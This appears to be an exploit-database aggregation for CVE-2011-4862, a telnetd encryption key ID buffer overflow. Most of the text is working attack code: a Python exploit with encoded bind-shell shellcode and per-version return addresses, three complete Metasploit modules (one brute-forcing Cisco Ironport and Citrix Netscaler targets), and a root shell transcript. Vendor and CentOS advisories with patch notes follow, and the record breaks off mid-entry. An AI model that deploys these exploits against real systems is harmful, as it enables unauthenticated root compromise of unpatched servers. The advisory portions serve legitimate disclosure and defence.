\"\\xda\\xd0\\xb8\\x7b\\x91\\x45\\xc5\\xd9\\x74\\x24\\xf4\\x5d\\x2b\\xc9\\xb1\\x0c\\x31\\x45\\x17\\x03\\x45\\x17\\x83\\x96\\x6d\\xa7\\x30\\x02\\xb5\\x70\\x22\\x80\\xa1\\xad\\x37\\x24\\x32\\x27\\x50\\x76\\x5a\\x59\\xb0\\x05\\xf2\\xcd\\xe1\\xc6\\x60\\x67\\x77\\xfb\\x37\\x9f\\x84\\xfb\\xb7\\x5f\\xe2\\x9f\\xb7\\x08\\xa7\\xd6\\x59\\xe4\\x16\\xbb\\xc9\\xc4\\x19\" \nelif sys.argv[1] == '-e': \n# slightly modified version of metasploits bsd/x86/shell_bind_tcp: \n# \n# bsd/x86/shell_bind_tcp - 100 bytes \n# http://www.metasploit.com \n# Encoder: x86/shikata_ga_nai \n# AutoRunScript=, AppendExit=false, PrependSetresuid=false, \n# InitialAutoRunScript=, PrependSetuid=false, LPORT=4444, \n# VERBOSE=false, RHOST=, PrependSetreuid=false \nbuf = \"\\xda\\xc8\\xbe\\x7b\\xd4\\xea\\x14\\xd9\\x74\\x24\\xf4\\x58\\x2b\\xc9\\xb1\\x13\\x31\\x70\\x18\\x83\\xc0\\x04\\x03\\x70\\x6f\\x36\\x1f\\x25\\x4f\\xe6\\x88\\xb9\\x4d\\x16\\x15\\xcf\\xb6\\x48\\xcf\\xce\\x52\\x6b\\x65\\xc1\\x12\\x0a\\xb4\\x61\\x05\\x9d\\x16\\x08\\xc1\\x45\\x5a\\x4c\\x98\\x31\\x88\\xfd\\xf0\\x70\\xd0\\x4e\\x1a\\x46\\x51\\xfe\\x72\\x32\\x08\\xa7\\xbf\\x42\\x53\\x18\\xdb\\x3a\\x5a\\xf7\\x4b\\x92\\x8d\\x8b\\xe3\\x84\\xfe\\x09\\x9a\\x3a\\x88\\x2d\\x0c\\x97\\xd9\\xe1\\x1c\\x2c\\x13\\x81\" \nelse: \nusage() \nexit() \nelse: \nusage() \nexit() \n \n \nsocket.setdefaulttimeout(10) \nrg = random.SystemRandom() \nalnum = string.letters[0:52] + string.digits \n \ndef rand_alnumlst(length): \nreturn list(''.join(rg.choice(alnum) for _ in range(length))) \n \nenc_init = \"\\xff\\xfa\\x26\\x00\\x01\\x01\\x12\\x13\\x14\\x15\\x16\\x17\\x18\\x19\\xff\\xf0\" \nenc_keyid = \"\\xff\\xfa\\x26\\x07\" \nend_suboption = \"\\xff\\xf0\" \n \n# ret values for multiple FreeBSD versions \nrets = 0x0804a8a9, 0x0804a889, 0x0804a869, 0x08057bd0, 0x0804c4e0, 0x0804a5b4, 0x08052925, 0x0804cf31, 0x8059730 \nversion = '8.2', '8.1', '8.0', '7.3/7.4', '7.0/7.1/7.2', '6.3/6.4', '6.0/6.1/6.2', '5.5', '5.3' \n \n# display banner \nprint \"Vulnerability checker/exploit for CVE-2011-4862 (FreeBSD telnetd encryption)\" \nprint \"by Knull, http://leethack.info\\n\" \n \ncount = 0 \ntried = 0 \n \n# loop through the ret's until one works \nfor ret in rets: \n \nkey_id = rand_alnumlst(400) \nkey_id[0:1] = \"\\xeb\\x76\" \nkey_id[72:75] = struct.pack('<I', ret - 20) \nkey_id[76:79] = struct.pack('<I', ret) \nkey_id[80:191] = rand_alnumlst(112) \nkey_id[120:121] = \"\\xeb\\x46\" \nkey_id[192:191+len(buf)] = buf \n \ns = '' \nfor i in key_id: \ns += ''.join(i) \n \nsploit = enc_keyid + s + end_suboption \n \nprint \"Trying FreeBSD \" + version[count] + \"...\\n\" \n \ntry: \n \nsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) \nsock.connect((host, port)) \nsock.send(enc_init) \ndata = sock.recv(32) \n \nsock.send(sploit) \ndata = sock.recv(32) \ntime.sleep(0.5) \n \nif data: \n \nsock.send(sploit) \ntime.sleep(0.5) \n \nif sys.argv[1] == '-e': \ntried = 1 \nsock.close() \n \nelif sys.argv[1] == '-c': \nresult = sock.recv(128) \nsock.close() \n \nif result.find(\"root\") != -1: \nprint host + \" is vulnerable, result of command: id\\n\" + result \nexit() \n \nsock.close() \n \nexcept socket.error: \npass \n \ncount+=1 \n \nif tried: \nprint \"Sent payloads, check bindshell on \" + host + \", port 4444\\n\" \n`\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/108694/freebsdtelnetd.py.txt"}, {"lastseen": "2016-12-05T22:17:27", "description": "", "published": "2011-12-28T00:00:00", "type": "packetstorm", "title": "FreeBSD Telnet Service Encyption Key ID Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-4862"], "modified": "2011-12-28T00:00:00", "id": "PACKETSTORM:108198", "href": "https://packetstormsecurity.com/files/108198/FreeBSD-Telnet-Service-Encyption-Key-ID-Buffer-Overflow.html", "sourceData": "`## \n# $Id: $ \n## \n \n## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \n \nrequire 'msf/core' \n \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = GreatRanking \n \ninclude Msf::Exploit::Remote::Telnet \ninclude Msf::Exploit::BruteTargets \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'FreeBSD Telnet Service Encyption Key ID Buffer Overflow', \n'Description' => %q{ \nThis module exploits a buffer overflow in the encryption option handler of the \nFreeBSD telnet service. \n}, \n'Author' => [ 'Jaime Penalba Estebanez <jpenalbae[at]gmail.com>', 'Brandon Perry', 'Dan Rosenberg', 'hdm' ], \n'License' => MSF_LICENSE, \n'References' => \n[ \n['BID', '51182'], \n['CVE', '2011-4862'], \n['URL', 'http://www.exploit-db.com/exploits/18280/'] \n], \n'Privileged' => true, \n'Platform' => 'bsd', \n'Payload' => \n{ \n'Space' => 128, \n'BadChars' => \"\\x00\", \n}, \n \n'Targets' => \n[ \n[ 'Automatic', { } ], \n[ 'FreeBSD 8.2', { 'Ret' => 0x0804a8a9 } ], # call edx \n[ 'FreeBSD 8.1', { 'Ret' => 0x0804a889 } ], # call edx \n[ 'FreeBSD 8.0', { 'Ret' => 0x0804a869 } ], # call edx \n[ 'FreeBSD 7.3/7.4', { 'Ret' => 0x08057bd0 } ], # call edx \n[ 'FreeBSD 7.0/7.1/7.2', { 'Ret' => 0x0804c4e0 } ], # call edx \n[ 'FreeBSD 6.3/6.4', { 'Ret' => 0x0804a5b4 } ], # call edx \n[ 'FreeBSD 6.0/6.1/6.2', { 'Ret' => 0x08052925 } ], # call edx \n[ 'FreeBSD 5.5', { 'Ret' => 0x0804cf31 } ], # call edx \n# [ 'FreeBSD 5.4', { 'Ret' => 0x08050006 } ] # Version 5.4 does not seem to be exploitable (the crypto() function is not called) \n[ 'FreeBSD 5.3', { 'Ret' => 0x8059730 } ], # direct return \n# Versions 5.2 and below do not support encyption \n], \n'DefaultTarget' => 0, \n'DisclosureDate' => '')) \nend \n \ndef exploit_target(t) \n \nconnect \nbanner_sanitized = Rex::Text.to_hex_ascii(banner.to_s) \nprint_status(banner_sanitized) if datastore['VERBOSE'] \n \nenc_init = \"\\xff\\xfa\\x26\\x00\\x01\\x01\\x12\\x13\\x14\\x15\\x16\\x17\\x18\\x19\\xff\\xf0\" \nenc_keyid = \"\\xff\\xfa\\x26\\x07\" \nend_suboption = \"\\xff\\xf0\" \n \n# Telnet protocol requires 0xff to be escaped with another \npenc = payload.encoded.gsub(\"\\xff\", \"\\xff\\xff\") \n \nkey_id = Rex::Text.rand_text_alphanumeric(400) \nkey_id[ 0, 2] = \"\\xeb\\x76\" \nkey_id[72, 4] = [ t['Ret'] - 20 ].pack(\"V\") \nkey_id[76, 4] = [ t['Ret'] ].pack(\"V\") \n \n# Some of these bytes can get mangled, jump over them \nkey_id[80,112] = Rex::Text.rand_text_alphanumeric(112) \n \n# Bounce to the real payload (avoid corruption) \nkey_id[120, 2] = \"\\xeb\\x46\" \n \n# The actual payload \nkey_id[192, penc.length] = penc \n \n# Create the Key ID command \nsploit = enc_keyid + key_id + end_suboption \n \n# Initiate encryption \nsock.put(enc_init) \n \n# Wait for a successful response \nloop do \ndata = sock.get_once(-1, 5) rescue nil \nif not data \nraise RuntimeError, \"This system does not support encryption\" \nend \nbreak if data.index(\"\\xff\\xfa\\x26\\x02\\x01\") \nend \n \n# The first request smashes the pointer \nprint_status(\"Sending first payload\") \nsock.put(sploit) \n \n# Make sure the server replied to the first request \ndata = sock.get_once(-1, 5) \nunless data \nprint_status(\"Server did not respond to first payload\") \nreturn \nend \n \n# Some delay between each request seems necessary in some cases \n::IO.select(nil, nil, nil, 0.5) \n \n# The second request results in the pointer being called \nprint_status(\"Sending second payload...\") \nsock.put(sploit) \n \nhandler \n \n::IO.select(nil, nil, nil, 0.5) \ndisconnect \nend \n \nend \n`\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/108198/freebsd-telnet-telnet_encrypt_keyid.rb.txt"}, {"lastseen": "2016-12-05T22:23:14", "description": "", "published": "2011-12-28T00:00:00", "type": "packetstorm", "title": "Linux BSD-derived Telnet Service Encyption Key ID Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-4862"], "modified": "2011-12-28T00:00:00", "id": "PACKETSTORM:108199", "href": "https://packetstormsecurity.com/files/108199/Linux-BSD-derived-Telnet-Service-Encyption-Key-ID-Buffer-Overflow.html", "sourceData": "`## \n# $Id: $ \n## \n \n## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \n \nrequire 'msf/core' \n \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = GreatRanking \n \ninclude Msf::Exploit::Remote::Telnet \ninclude Msf::Exploit::BruteTargets \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Linux BSD-derived Telnet Service Encyption Key ID Buffer Overflow', \n'Description' => %q{ \nThis module exploits a buffer overflow in the encryption option handler of the \nLinux BSD-derived telnet service (inetutils or krb5-telnet). Most Linux distributions \nuse NetKit-derived telnet daemons, so this flaw only applies to a small subset of \nLinux systems running telnetd. \n}, \n'Author' => [ 'Jaime Penalba Estebanez <jpenalbae[at]gmail.com>', 'Brandon Perry', 'Dan Rosenberg', 'hdm' ], \n'License' => MSF_LICENSE, \n'References' => \n[ \n['BID', '51182'], \n['CVE', '2011-4862'], \n['URL', 'http://www.exploit-db.com/exploits/18280/'] \n], \n'Privileged' => true, \n'Platform' => 'linux', \n'Payload' => \n{ \n'Space' => 200, \n'BadChars' => \"\\x00\", \n'DisableNops' => true, \n}, \n \n'Targets' => \n[ \n[ 'Automatic', { } ], \n[ 'Red Hat Enterprise Linux 3 (krb5-telnet)', { 'Ret' => 0x0804b43c } ], \n \n], \n'DefaultTarget' => 0, \n'DisclosureDate' => '')) \nend \n \ndef exploit_target(t) \n \nconnect \nbanner_sanitized = Rex::Text.to_hex_ascii(banner.to_s) \nprint_status(banner_sanitized) if datastore['VERBOSE'] \n \nenc_init = \"\\xff\\xfa\\x26\\x00\\x01\\x01\\x12\\x13\\x14\\x15\\x16\\x17\\x18\\x19\\xff\\xf0\" \nenc_keyid = \"\\xff\\xfa\\x26\\x07\" \nend_suboption = \"\\xff\\xf0\" \n \npenc = payload.encoded.gsub(\"\\xff\", \"\\xff\\xff\") \n \nkey_id = Rex::Text.rand_text_alphanumeric(400) \n \nkey_id[ 0, 2] = \"\\xeb\\x76\" \nkey_id[72, 4] = [ t['Ret'] - 20 ].pack(\"V\") \nkey_id[76, 4] = [ t['Ret'] ].pack(\"V\") \n \n# Some of these bytes can get mangled, jump over them \nkey_id[80,40] = \"\\x41\" * 40 \n \n# Insert the real payload \nkey_id[120, penc.length] = penc \n \n# Create the Key ID command \nsploit = enc_keyid + key_id + end_suboption \n \n# Initiate encryption \nsock.put(enc_init) \n \n# Wait for a successful response \nloop do \ndata = sock.get_once(-1, 5) rescue nil \nif not data \nraise RuntimeError, \"This system does not support encryption\" \nend \nbreak if data.index(\"\\xff\\xfa\\x26\\x02\\x01\") \nend \n \n# The first request smashes the pointer \nprint_status(\"Sending first payload\") \nsock.put(sploit) \n \n# Make sure the server replied to the first request \ndata = sock.get_once(-1, 5) \nunless data \nprint_status(\"Server did not respond to first payload\") \nreturn \nend \n \n# Some delay between each request seems necessary in some cases \n::IO.select(nil, nil, nil, 0.5) \n \n# The second request results in the pointer being called \nprint_status(\"Sending second payload...\") \nsock.put(sploit) \nhandler \n \n::IO.select(nil, nil, nil, 0.5) \ndisconnect \nend \n \nend \n`\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/108199/linux-telnet-telnet_encrypt_keyid.rb.txt"}, {"lastseen": "2016-12-05T22:14:48", "description": "", "published": "2012-01-11T00:00:00", "type": "packetstorm", "title": "FreeBSD based telnetd encrypt_key_id brute force", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-4862"], "modified": "2012-01-11T00:00:00", "id": "PACKETSTORM:108539", "href": "https://packetstormsecurity.com/files/108539/FreeBSD-based-telnetd-encrypt_key_id-brute-force.html", "sourceData": "`## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \n \nrequire 'msf/core' \n \n \nclass Metasploit3 < Msf::Exploit::Remote \n \ninclude Msf::Exploit::Remote::Tcp \ninclude Msf::Exploit::Brute \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'FreeBSD based telnetd encrypt_key_id brute force', \n'Description' => %q{ \nThis module exploits a buffer overflow in the encryption option handler of the \nFreeBSD telnet service. \n}, \n'Author' => [ 'Nenad Stojanovski <nenad.stojanovski[at]gmail.com>' ], \n'References' => \n[ \n['BID', '51182'], \n['OSVDB', '78020'], \n['CVE', '2011-4862'], \n['URL', 'http://www.exploit-db.com/exploits/18280/'] \n], \n'Privileged' => true, \n'Payload' => \n{ \n'Space' => 128, \n'BadChars' => \"\\x00\", \n}, \n'Platform' => [ 'bsd' ], \n'Targets' => \n[ \n# \n# specific targets \n# \n[ 'Cisco Ironport 7.x Bruteforce', \n{ \n'Bruteforce' => \n{ \n \n'Start' => { 'Ret' => 0x0805cffd }, \n'Stop' => { 'Ret' => 0x0805aa00 }, \n'Step' => 8 \n} \n} \n], \n \n[ 'Citrix Netscaler 9.x', \n{ \n'Bruteforce' => \n{ \n \n'Start' => { 'Ret' => 0x0805bffd }, \n'Stop' => { 'Ret' => 0x08059000 }, \n'Step' => 8 \n} \n} \n], \n \n[ 'Other FreeBSD based targets', \n{ \n'Bruteforce' => \n{ \n \n'Start' => { 'Ret' => 0x0805fffd }, \n'Stop' => { 'Ret' => 0x08050000 }, \n'Step' => 8 \n} \n} \n], \n \n \n], \n'DefaultTarget' => 0, \n'DisclosureDate' => 'Dec 23 2011')) \n \nregister_options( \n[ \nOpt::RPORT(23), \n], self.class ) \nend \n \ndef brute_exploit(addrs) \ncurr_ret = addrs['Ret'] \nbegin \nconnect \n \nsock.get_once \nprint_status('Initiate encryption mode ...') \n \nreq = '' \nreq << \"\\xff\\xfa\\x26\\x00\\x01\\x01\\x12\\x13\" \nreq << \"\\x14\\x15\\x16\\x17\\x18\\x19\\xff\\xf0\" \nreq << \"\\x00\" \n \nsock.put(req) \nsock.get_once \nreq = '' \nprint_status(\"Trying return address 0x%.8x...\" % curr_ret ) \nprint_status('Sending first payload ...') \n \nreq << \"\\xff\\xfa\\x26\\x07\" \nreq << \"\\x00\" \nreq << make_nops(71) \npenc = payload.encoded.gsub(\"\\xff\", \"\\xff\\xff\") \nreq << [curr_ret].pack('V') \nreq << [curr_ret].pack('V') \n \nreq << make_nops(128) \nreq << penc \nreq << \"\\x90\\x90\\x90\\x90\" \nreq << \"\\xff\\xf0\" \nreq << \"\\x00\" \n \nsock.put(req) \nsock.get_once \nprint_status('Sending second payload ...') \nsock.put(req) \n \ndisconnect \nhandler \nrescue \nend \nend \n \nend`\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/108539/telnet_encrypt_keyid_bruteforce.rb.txt"}], "saint": [{"lastseen": "2016-10-03T15:01:56", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-4862"], "description": "Added: 02/11/2012 \nCVE: [CVE-2011-4862](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4862>) \nBID: [51182](<http://www.securityfocus.com/bid/51182>) \nOSVDB: [78020](<http://www.osvdb.org/78020>) \n\n\n### Background\n\nTelnet is a network protocol used on the Internet or local area networks to provide a bidirectional interactive text-oriented communications facility using a virtual terminal connection. \n\n### Problem\n\nThe flaw is caused due to a boundary error within the \"encrypt_keyid()\" function (libtelnet/encrypt.c). This can be exploited to cause a buffer overflow via a long encryption key. \n\n### Resolution\n\nApply the vendor supplied patch for the target system or update FreeBSD/krb5. \n\n### References\n\n<http://web.mit.edu/kerberos/advisories/MITKRB5-SA-2011-008.txt> \n<http://thexploit.com/secdev/a-textbook-buffer-overflow-a-look-at-the-freebsd-telnetd-code/> \n\n\n### Limitations\n\nThis exploit has been tested against telnetd on FreeBSD 8.0, FreeBSD 8.2, NetBSD 5.1 and Debian 6.0.2 Heimdal Server 1.5. \n\n### Platforms\n\nFreeBSD 8.0 \nFreeBSD 8.1 \nFreeBSD 8.2 \nNetBSD 5.1 \nLinux / Debian \n \n\n", "edition": 1, "modified": "2012-02-11T00:00:00", "published": "2012-02-11T00:00:00", "id": "SAINT:4B6F19E604FCF1B28C3D4F6A458FF688", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/telnet_server_encrypt_keyid", "type": "saint", "title": "Telnetd Encryption Key ID Code Execution", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-06-04T23:19:30", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-4862"], "description": "Added: 02/11/2012 \nCVE: [CVE-2011-4862](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4862>) \nBID: [51182](<http://www.securityfocus.com/bid/51182>) \nOSVDB: [78020](<http://www.osvdb.org/78020>) \n\n\n### Background\n\nTelnet is a network protocol used on the Internet or local area networks to provide a bidirectional interactive text-oriented communications facility using a virtual terminal connection. \n\n### Problem\n\nThe flaw is caused due to a boundary error within the \"encrypt_keyid()\" function (libtelnet/encrypt.c). This can be exploited to cause a buffer overflow via a long encryption key. \n\n### Resolution\n\nApply the vendor supplied patch for the target system or update FreeBSD/krb5. \n\n### References\n\n<http://web.mit.edu/kerberos/advisories/MITKRB5-SA-2011-008.txt> \n<http://thexploit.com/secdev/a-textbook-buffer-overflow-a-look-at-the-freebsd-telnetd-code/> \n\n\n### Limitations\n\nThis exploit has been tested against telnetd on FreeBSD 8.0, FreeBSD 8.2, NetBSD 5.1 and Debian 6.0.2 Heimdal Server 1.5. \n\n### Platforms\n\nFreeBSD 8.0 \nFreeBSD 8.1 \nFreeBSD 8.2 \nNetBSD 5.1 \nLinux / Debian \n \n\n", "edition": 4, "modified": "2012-02-11T00:00:00", "published": "2012-02-11T00:00:00", "id": "SAINT:2E667FA9EE1CC48C054B8BF1D1337065", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/telnet_server_encrypt_keyid", "title": "Telnetd Encryption Key ID Code Execution", "type": "saint", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T19:19:29", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-4862"], "edition": 2, "description": "Added: 02/11/2012 \nCVE: [CVE-2011-4862](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4862>) \nBID: [51182](<http://www.securityfocus.com/bid/51182>) \nOSVDB: [78020](<http://www.osvdb.org/78020>) \n\n\n### Background\n\nTelnet is a network protocol used on the Internet or local area networks to provide a bidirectional interactive text-oriented communications facility using a virtual terminal connection. \n\n### Problem\n\nThe flaw is caused due to a boundary error within the \"encrypt_keyid()\" function (libtelnet/encrypt.c). This can be exploited to cause a buffer overflow via a long encryption key. \n\n### Resolution\n\nApply the vendor supplied patch for the target system or update FreeBSD/krb5. \n\n### References\n\n<http://web.mit.edu/kerberos/advisories/MITKRB5-SA-2011-008.txt> \n<http://thexploit.com/secdev/a-textbook-buffer-overflow-a-look-at-the-freebsd-telnetd-code/> \n\n\n### Limitations\n\nThis exploit has been tested against telnetd on FreeBSD 8.0, FreeBSD 8.2, NetBSD 5.1 and Debian 6.0.2 Heimdal Server 1.5. \n\n### Platforms\n\nFreeBSD 8.0 \nFreeBSD 8.1 \nFreeBSD 8.2 \nNetBSD 5.1 \nLinux / Debian \n \n\n", "modified": "2012-02-11T00:00:00", "published": "2012-02-11T00:00:00", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/telnet_server_encrypt_keyid", "id": "SAINT:9BB5708972A26A51904B1BC21D31E721", "type": "saint", "title": "Telnetd Encryption Key ID Code Execution", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "zdt": [{"lastseen": "2018-04-14T23:50:13", "description": "The Cisco Ironport WSA virtual appliances are vulnerable to an old FreeBSD telnetd encryption Key ID buffer overflow which allows remote attackers to execute arbitrary code. Cisco WSA Virtual appliances have the vulnerable telnetd daemon enabled by default.", "edition": 2, "published": "2014-10-24T00:00:00", "type": "zdt", "title": "Cisco Ironport WSA telnetd Remote Code Execution Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-4862"], "modified": "2014-10-24T00:00:00", "id": "1337DAY-ID-22784", "href": "https://0day.today/exploit/description/22784", "sourceData": "Cisco Ironport WSA Telnetd Remote Code Execution Vulnerability\r\nVendor: Cisco\r\nProduct web page: http://www.cisco.com\r\nAffected version: Cisco Ironport WSA - AsyncOS 8.0.5 for Web build 075\r\nDate: 22/05/2014\r\nCredits: Glafkos Charalambous\r\nCVE: CVE-2011-4862\r\nCVSS Score: 7.6\r\nImpact: Unauthenticated Remote Code Execution with elevated privileges\r\nDescription: The Cisco Ironport WSA virtual appliances are vulnerable to an old FreeBSD telnetd encryption Key ID buffer overflow which allows remote attackers to execute arbitrary code (CVE-2011-4862).\r\nCisco WSA Virtual appliances have the vulnerable telnetd daemon enabled by default. \r\n\r\ndiff --git a/ChangeLog b/ChangeLog\r\nindex dd381d1..f4e4457 100644\r\n--- a/ChangeLog\r\n+++ b/ChangeLog\r\n@@ -1,3 +1,8 @@\r\n+2011-12-25 Alfred M. Szmidt <[email\u00a0protected]>\r\n+\r\n+ * libtelnet/encrypt.c (encrypt_keyid): Make sure that LEN never is\r\n+ greater than MAXKEYLEN.\r\n+\r\n 2011-12-22 Mats Erik Andersson <[email\u00a0protected]>\r\n \r\n * libinetutils/setsig.c (setsig) [HAVE_SIGACTION]: Initialize\r\ndiff --git a/libtelnet/encrypt.c b/libtelnet/encrypt.c\r\nindex 06827d9..abfa6d4 100644\r\n--- a/libtelnet/encrypt.c\r\n+++ b/libtelnet/encrypt.c\r\n@@ -796,6 +796,9 @@ encrypt_keyid (kp, keyid, len)\r\n int dir = kp->dir;\r\n register int ret = 0;\r\n \r\n+ if (len > MAXKEYLEN)\r\n+ len = MAXKEYLEN;\r\n+\r\n if (!(ep = (*kp->getcrypt) (*kp->modep)))\r\n {\r\n if (len == 0)\r\n\r\n\r\nTrying 192.168.0.160...\r\nConnected to 192.168.0.160.\r\nEscape character is '^]'.\r\n\r\n[+] Exploiting 192.168.0.160, telnetd rulez!\r\n[+] Target OS - FreeBSD 8.2 amd64\r\n[*] Enjoy your shell\r\nuid=0(root) gid=0(wheel) groups=0(wheel),5(operator)\r\nuname -a\r\nFreeBSD ironport.example.com 8.2-RELEASE FreeBSD 8.2-RELEASE #0: Fri Mar 14 10:49:50 PDT 2014 [email\u00a0protected]:/usr/build/iproot/freebsd/mods/src/sys/amd64/compile/MESSAGING_GATEWAY.amd64 amd64\r\n\r\nDisclosure Timeline\r\n19-05-2014: Vendor Notification\r\n20-05-2014: Vendor Response/Feedback\r\n27-08-2014: Vendor Fix/Patch\r\n22-10-2014: Public Disclosure\r\n\r\nReferences:\r\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4862\r\nhttp://www.freebsd.org/security/advisories/FreeBSD-SA-11:08.telnetd.asc\r\nhttp://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20120126-ironport\n\n# 0day.today [2018-04-14] #", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/22784"}], "cisco": [{"lastseen": "2020-12-24T11:41:41", "bulletinFamily": "software", "cvelist": ["CVE-2011-4862"], "description": "A vulnerability in telnet code of Cisco AsyncOS could allow an\nunauthenticated, remote attacker to to execute arbitrary code on the\naffected system.\n\nThe vulnerability is due to insufficient boundary\nchecks when processing telnet encryption keys. An unauthenticated,\nremote attacker could exploit this vulnerability by sending malicious\nrequests to a targeted system. If successful, the attacker could\nexecute arbitrary code on the system with elevated privileges.\n\nCisco AsyncOS Software for Cisco Web Security Appliance (WSA), Cisco Email Security Appliance (ESA), and Cisco Content Security Management Appliance (SMA) contain a vulnerability that may allow a remote, unauthenticated attacker to execute arbitrary code with elevated privileges. \n\nCisco has released software updates that address this vulnerability. Workarounds that mitigate this vulnerability are available. \n\nNote: This security advisory has been updated to include important information about Cisco WSA\n\nThis advisory is available at the following link:\n\nhttp://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20120126-ironport[\"http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20120126-ironport\"]", "modified": "2014-12-08T21:21:32", "published": "2012-01-26T17:00:00", "id": "CISCO-SA-20120126-IRONPORT", "href": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20120126-ironport", "type": "cisco", "title": "Cisco IronPort Appliances Telnet Remote Code Execution Vulnerability", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "centos": [{"lastseen": "2019-12-20T18:28:59", "bulletinFamily": "unix", "cvelist": ["CVE-2011-4862"], "description": "**CentOS Errata and Security Advisory** CESA-2011:1852\n\n\nThe krb5-appl packages provide Kerberos-aware telnet, ftp, rcp, rsh, and\nrlogin clients and servers. Kerberos is a network authentication system\nwhich allows clients and servers to authenticate to each other using\nsymmetric encryption and a trusted third-party, the Key Distribution Center\n(KDC).\n\nA buffer overflow flaw was found in the MIT krb5 telnet daemon (telnetd). A \nremote attacker who can access the telnet port of a target machine could use\nthis flaw to execute arbitrary code as root. (CVE-2011-4862) \n\nNote that the krb5 telnet daemon is not enabled by default in any version of\nRed Hat Enterprise Linux. In addition, the default firewall rules block\nremote access to the telnet port. This flaw does not affect the telnet\ndaemon distributed in the telnet-server package.\n\nFor users who have installed the krb5-appl-servers package, have enabled the \nkrb5 telnet daemon, and have it accessible remotely, this update should be\napplied immediately. \n\nAll krb5-appl-server users should upgrade to these updated packages, which \ncontain a backported patch to correct this issue.\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2011-December/030399.html\n\n**Affected packages:**\nkrb5-appl\nkrb5-appl-clients\nkrb5-appl-servers\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2011-1852.html", "edition": 3, "modified": "2011-12-27T21:11:42", "published": "2011-12-27T21:11:42", "href": "http://lists.centos.org/pipermail/centos-announce/2011-December/030399.html", "id": "CESA-2011:1852", "title": "krb5 security update", "type": "centos", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-12-20T18:27:16", "bulletinFamily": "unix", "cvelist": ["CVE-2011-4862"], "description": "**CentOS Errata and Security Advisory** CESA-2011:1851\n\n\nKerberos is a network authentication system which allows clients and servers\nto authenticate to each other using symmetric encryption and a trusted third-\nparty, the Key Distribution Center (KDC).\n\nA buffer overflow flaw was found in the MIT krb5 telnet daemon (telnetd). A\nremote attacker who can access the telnet port of a target machine could use\nthis flaw to execute arbitrary code as root. (CVE-2011-4862)\n\nNote that the krb5 telnet daemon is not enabled by default in any version of \nRed Hat Enterprise Linux. In addition, the default firewall rules block\nremote access to the telnet port. This flaw does not affect the telnet\ndaemon distributed in the telnet-server package.\n\nFor users who have installed the krb5-workstation package, have enabled the\ntelnet daemon, and have it accessible remotely, this update should be\napplied immediately. \n\nAll krb5-workstation users should upgrade to these updated packages, which\ncontain a backported patch to correct this issue.\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2011-December/030397.html\nhttp://lists.centos.org/pipermail/centos-announce/2011-December/030398.html\n\n**Affected packages:**\nkrb5\nkrb5-devel\nkrb5-libs\nkrb5-server\nkrb5-server-ldap\nkrb5-workstation\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2011-1851.html", "edition": 3, "modified": "2011-12-27T20:56:16", "published": "2011-12-27T20:44:52", "href": 